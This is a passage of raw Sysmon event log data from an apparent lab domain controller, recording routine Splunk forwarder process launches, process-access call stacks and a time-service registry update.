YSTEM32\ntdll.dll+51791 10341000x80000000000000009355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.844{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000009366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:55:02.671{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda1-0x84c037d7) 10341000x80000000000000009379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.638{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:44.639{59A5CD1D-9360-6005-D004-00000000A301}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.654{59A5CD1D-9361-6005-D104-00000000A301}42364396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
